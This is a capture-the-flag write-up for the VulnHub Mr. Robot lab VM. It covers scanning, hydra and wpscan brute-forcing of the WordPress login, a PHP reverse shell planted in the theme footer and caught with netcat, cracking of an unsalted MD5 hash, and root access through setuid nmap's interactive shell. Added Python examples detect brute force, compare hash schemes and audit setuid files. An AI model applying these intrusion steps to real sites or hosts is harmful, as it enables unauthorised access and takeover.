Third Boot2Root Mr.Robot
Hello Folks!
Link to Box :-https://www.vulnhub.com/entry/mr-robot-1,151/
Rating:- Beginner-Intermediate
Time :- 2 hours (Majorly because of brute force)
Welcome to the Third Boot2Root! We start the box by running "arp-scan -l" to find out which IP the box is running on, then run an nmap scan against it, which gives us this:
nmap -sV -O -A 192.168.0.100
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-10 15:14 IST
Nmap scan report for 192.168.0.100
Host is up (0.00038s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
MAC Address: 08:00:27:07:9E:BF (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.0.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.36 seconds
So we have an open port 80; without wasting much time, let's get to it. HTTP on port 80 gives me this. I've gotta admit, AMAZING visuals.
After going through all the pages nothing interesting struck me, so I followed the very basic step of always checking "robots.txt", and found this:
So we've come up with the first flag already?
Flag one :- 073403c8a58a1f80d943455fb30724b9
The second link is http://192.168.0.100/fsocity.dic, which is a dictionary file. Maybe we can use it for brute-forcing, so let's save it.
So, without wasting much time, I ran "dirb http://192.168.0.100" and it came up with tons of links, but I luckily spotted "admin", and it was a WordPress page.
---- Scanning URL: http://192.168.0.106/ ----
==> DIRECTORY: http://192.168.0.106/0/
==> DIRECTORY: http://192.168.0.106/admin/
+ http://192.168.0.106/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.0.106/audio/
==> DIRECTORY: http://192.168.0.106/blog/
==> DIRECTORY: http://192.168.0.106/css/
+ http://192.168.0.106/dashboard (CODE:302|SIZE:0)
+ http://192.168.0.106/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.106/feed/
==> DIRECTORY: http://192.168.0.106/image/
==> DIRECTORY: http://192.168.0.106/Image/
==> DIRECTORY: http://192.168.0.106/images/
+ http://192.168.0.106/index.html (CODE:200|SIZE:1188)
+ http://192.168.0.106/index.php (CODE:301|SIZE:0)
+ http://192.168.0.106/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.0.106/js/
+ http://192.168.0.106/license (CODE:200|SIZE:19930)
+ http://192.168.0.106/login (CODE:302|SIZE:0)
+ http://192.168.0.106/page1 (CODE:301|SIZE:0)
+ http://192.168.0.106/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.0.106/rdf (CODE:301|SIZE:0)
+ http://192.168.0.106/readme (CODE:200|SIZE:7356)
+ http://192.168.0.106/robots (CODE:200|SIZE:41)
+ http://192.168.0.106/robots.txt (CODE:200|SIZE:41)
+ http://192.168.0.106/rss (CODE:301|SIZE:0)
+ http://192.168.0.106/rss2 (CODE:301|SIZE:0)
+ http://192.168.0.106/sitemap (CODE:200|SIZE:0)
+ http://192.168.0.106/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.106/video/
==> DIRECTORY: http://192.168.0.106/wp-admin/
+ http://192.168.0.106/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.106/wp-content/
+ http://192.168.0.106/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.106/wp-includes/
+ http://192.168.0.106/wp-links-opml (CODE:200|SIZE:228)
+ http://192.168.0.106/wp-load (CODE:200|SIZE:0)
+ http://192.168.0.106/wp-login (CODE:200|SIZE:2675)
+ http://192.168.0.106/wp-mail (CODE:403|SIZE:3018)
+ http://192.168.0.106/wp-settings (CODE:500|SIZE:0)
+ http://192.168.0.106/wp-signup (CODE:302|SIZE:0)
+ http://192.168.0.106/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.0.106/xmlrpc.php (CODE:405|SIZE:42)
So, a no-brainer step here: let's start with WPScan to see if we can find any users.
Unfortunately it can't find any users, so it's time to use the dictionary file we got from the first page and try to brute-force a username.
root@localhost:~# wpscan -u http://192.168.0.106 --enumerate u
_______________________________________________________________
__          _______   _____
\ \        / /  __ \ / ____|
 \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
  \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
   \  /\  /  | |     ____) | (__| (_| | | | |
    \/  \/   |_|    |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.0.106/
[+] Started: Tue Oct 10 16:56:25 2017
[+] robots.txt available under: 'http://192.168.0.106/robots.txt'
[!] The WordPress 'http://192.168.0.106/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.0.106/xmlrpc.php
[+] WordPress version 4.3.12 (Released on 2017-09-19) identified from advanced fingerprinting, rss generator, rdf generator, atom generator, links opml
[!] 1 vulnerability identified from the version number
[!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://core.trac.wordpress.org/ticket/25239
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Enumerating usernames ...
[+] We did not enumerate any usernames
[+] Finished: Tue Oct 10 16:56:26 2017
[+] Requests Done: 56
[+] Memory used: 17.488 MB
[+] Elapsed time: 00:00:01
I used hydra for this purpose
hydra -L wordlist -p idontknow 192.168.0.106 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid"
[80][http-post-form] host: 192.168.0.106 login: Elliot password: idontknow
[STATUS] 795.00 tries/min, 795 tries in 00:01h, 185569 to do in 03:54h, 16 active
[80][http-post-form] host: 192.168.0.106 login: elliot password: idontknow
I fed in the password as "idontknow" because for now I am only interested in finding valid usernames (WordPress answers "Invalid username" for unknown users, so anything that does not get that message is a real account); you can feed in whatever you like. So the username is Elliot. Let's use the same wordlist again against this username to see if we can find a password in the list.
wpscan -u 192.168.0.106 --wordlist /root/Desktop/mrrobot/wordlist --username Elliot
+----+--------+------+-----------+
| Id | Login  | Name | Password  |
+----+--------+------+-----------+
|    | Elliot |      | ER28-0652 |
+----+--------+------+-----------+
There we go: Elliot:ER28-0652
So we are inside the admin panel now; we just need to put in a reverse shell and run "nc -lvnp <PORT>" to catch the session.
Link to the shell: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
So let's change the IP address (and port) in the shell to match our listener and paste the file in under Appearance > Editor > footer.php.
Then we visit http://192.168.0.106/admin/blog, which loads the footer,
and we get a session on the nc listener:
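The whole enumeration and password-guessing phase above is very loud on the server side: hundreds of POSTs to wp-login.php per minute from one client, each answered with a 200 (the login form re-rendered with an error) until the single 302 redirect that marks a successful login. As an added example that is not part of the original write-up, here is a small Python detector run over constructed Apache combined-format access log lines; the IPs, timestamps, window and threshold are assumptions chosen to resemble the hydra run.

```python
"""Spot WordPress login brute force in Apache access logs.

Added example for this write-up, not code from the original post.
The SAMPLE_LOG lines are constructed; the IPs, timestamps, window and
threshold are assumptions chosen to resemble the hydra run above.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: ip ident user [ts] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: a burst from .104 (five 200s = form re-rendered with an error,
# then a 302 = successful login redirect) and a normal visitor from .50.
SAMPLE_LOG = """\
192.168.0.104 - - [10/Oct/2017:16:58:01 +0530] "POST /wp-login.php HTTP/1.1" 200 2675 "-" "Mozilla/4.0 (Hydra)"
192.168.0.104 - - [10/Oct/2017:16:58:01 +0530] "POST /wp-login.php HTTP/1.1" 200 2675 "-" "Mozilla/4.0 (Hydra)"
192.168.0.104 - - [10/Oct/2017:16:58:02 +0530] "POST /wp-login.php HTTP/1.1" 200 2675 "-" "Mozilla/4.0 (Hydra)"
192.168.0.104 - - [10/Oct/2017:16:58:02 +0530] "POST /wp-login.php HTTP/1.1" 200 2675 "-" "Mozilla/4.0 (Hydra)"
192.168.0.104 - - [10/Oct/2017:16:58:03 +0530] "POST /wp-login.php HTTP/1.1" 200 2675 "-" "Mozilla/4.0 (Hydra)"
192.168.0.104 - - [10/Oct/2017:16:58:03 +0530] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0 (Hydra)"
192.168.0.50 - - [10/Oct/2017:16:58:05 +0530] "GET /blog/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Oct/2017:17:20:00 +0530] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_login_bruteforce(log_text, window_seconds=60, threshold=5):
    """One alert per client IP that POSTs to /wp-login.php at least `threshold`
    times inside any `window_seconds` span; a 302 from that IP means a login succeeded."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            by_ip[rec["ip"]].append(rec)

    window = timedelta(seconds=window_seconds)
    alerts = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start, peak = 0, 0
        for end in range(len(recs)):  # sliding window over the sorted attempts
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({
                "ip": ip,
                "attempts": len(recs),
                "peak_in_window": peak,
                "probable_success": any(r["status"] == 302 for r in recs),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_login_bruteforce(SAMPLE_LOG):
        print(alert)
```

The single legitimate login from 192.168.0.50 never reaches the threshold, while the burst from 192.168.0.104 is reported together with its probable success, which is the event an incident responder actually wants to see first. The same logic applies unchanged to the wpscan password run, since it posts to the same endpoint.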
root@localhost:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.0.104] from (UNKNOWN) [192.168.0.106] 40750
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
12:53:19 up 2:15, 0 users, load average: 5.23, 8.54, 6.93
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/
$ ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
$ cd /home
$ ls
robot
$ cd robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
$
So we get an MD5 hash; let's try to break it. Link to the decryptor :- http://md5decrypt.net
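The reason this hash falls instantly is that it is a raw, unsalted MD5 of the password, so one public lookup table answers it for every site that stored it that way. The following Python is an added example (not from the original post): it verifies the lookup locally against a constructed stand-in for fsocity.dic and contrasts it with a salted, iterated PBKDF2 hash of the same password; the iteration count and salt length are assumptions.

```python
"""Why robot's password was recovered instantly: unsalted MD5.

Added example for this write-up, not code from the original post.  LEAKED is the
line read from /home/robot/password.raw-md5; WORDLIST is a constructed stand-in
for fsocity.dic; the PBKDF2 iteration count and salt length are assumptions.
"""
import hashlib
import hmac
import os

LEAKED = "robot:c3fcd3d76192e4007dfb496cca67e13b"

# Constructed mini-wordlist (the real fsocity.dic has hundreds of thousands of lines).
WORDLIST = ["password", "elliot", "mrrobot", "fsociety", "abcdefghijklmnopqrstuvwxyz"]


def md5_dictionary_check(hash_line, words):
    """Return the word whose raw MD5 equals the stored digest, or None.
    With no salt the digest is identical everywhere the password was used, which is
    exactly what a precomputed table such as md5decrypt.net's relies on."""
    _user, digest = hash_line.split(":", 1)
    digest = digest.strip().lower()
    for w in words:
        if hashlib.md5(w.encode()).hexdigest() == digest:
            return w
    return None


def pbkdf2_hash(password, salt=None, iterations=600_000):
    """Salted, iterated hash: each guess costs `iterations` HMAC-SHA256 rounds and the
    random 16-byte salt makes precomputed tables useless (assumed parameters)."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    word = md5_dictionary_check(LEAKED, WORDLIST)
    print("raw MD5 matched:", word)
    stored = pbkdf2_hash(word)
    print("same password as PBKDF2:", stored)
    print("a second hash of the same password differs:", pbkdf2_hash(word) != stored)
```

Running it shows the alphabet string matching the leaked digest on the first pass, while two PBKDF2 hashes of that same string differ because of the salt; anyone storing local credentials in a file like password.raw-md5 should be using the second form (or bcrypt/scrypt/Argon2).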
So now we have a username and password, and we can try "su robot" with robot:abcdefghijklmnopqrstuvwxyz.
But to run "su robot" we first need a proper TTY shell, which we can spawn with:
python -c 'import pty; pty.spawn("/bin/bash")'
root@localhost:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.0.104] from (UNKNOWN) [192.168.0.106] 40767
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
13:15:44 up 2:37, 0 users, load average: 0.01, 0.13, 1.66
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/$ cd /home/robot
cd /home/robot
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$
YAY, Flag 2: 822c73956184f694993bede3eb39f959
Once we were in as robot I enumerated further and found an old nmap (3.81) whose interactive mode can run shell commands; since the binary is setuid root on this box, we can use it to spawn a root shell and grab the final flag!
robot@linux:~$ nmap --version
nmap --version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:~$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
#
And the final FLAG is: 04787ddef27c3dee1ee161b21670b4e4
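The root shell above comes from two things together: nmap 3.81's "--interactive" mode, which runs shell commands via "!sh", and the binary carrying the setuid bit so that shell inherits root. The defensive counterpart is a periodic audit for setuid files that are not on an expected list. The Python below is an added example, not part of the original write-up: it walks a tree, lists setuid/setgid regular files, compares them against an assumed baseline of binaries that legitimately need the bit, and shows the remediation (clearing the bit). The tree it builds for its demo is constructed sample data.

```python
"""Audit a directory tree for setuid/setgid binaries and clear unexpected ones.

Added example for this write-up, not code from the original post.  EXPECTED_SUID
is an assumed baseline for a typical Ubuntu host; the demo tree is constructed.
"""
import os
import stat
import tempfile

# Assumed baseline: binaries that normally need setuid on Ubuntu.  Anything else
# (an old nmap with interactive mode, for instance) deserves a second look.
EXPECTED_SUID = {"su", "sudo", "passwd", "mount", "umount", "ping", "chsh", "chfn",
                 "gpasswd", "newgrp"}


def find_setid_files(root):
    """Yield (path, mode, owner_uid) for regular files with the setuid or setgid bit.
    Symlinks are skipped (lstat) so a link to a privileged binary is not double-counted."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, st.st_mode, st.st_uid


def unexpected_setuid(root, expected=EXPECTED_SUID):
    """Paths under `root` that are setuid but whose basename is not in the baseline."""
    return sorted(
        path for path, mode, _uid in find_setid_files(root)
        if mode & stat.S_ISUID and os.path.basename(path) not in expected
    )


def strip_setuid(path):
    """Remediation: clear setuid and setgid (same effect as `chmod u-s,g-s`).
    Returns the resulting permission bits."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode & ~(stat.S_ISUID | stat.S_ISGID))
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Build a throwaway tree (constructed sample data) and run the audit over it."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    for name, mode in (("nmap", 0o4755), ("passwd", 0o4755), ("plain", 0o755)):
        path = os.path.join(root, name)
        open(path, "w").close()
        os.chmod(path, mode)  # set the bits after the write, since writing clears setuid
    found = {os.path.basename(p) for p, _, _ in find_setid_files(root)}
    unexpected = [os.path.basename(p) for p in unexpected_setuid(root)]
    fixed_mode = strip_setuid(os.path.join(root, "nmap"))
    remaining = [os.path.basename(p) for p in unexpected_setuid(root)]
    return {"found": found, "unexpected": unexpected,
            "fixed_mode": fixed_mode, "remaining": remaining}


if __name__ == "__main__":
    result = demo()
    print("setid files:", sorted(result["found"]))
    print("unexpected setuid:", result["unexpected"])
    print("mode after fix: %o" % result["fixed_mode"])
    print("unexpected after fix:", result["remaining"])
```

Against a real host you would run find_setid_files("/") as root and diff the result against a known-good list captured at build time; on this box the nmap binary is what would show up as unexpected, and strip_setuid (or simply removing the ancient nmap) closes the path to root.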
So that's it for the day!
Thank You!!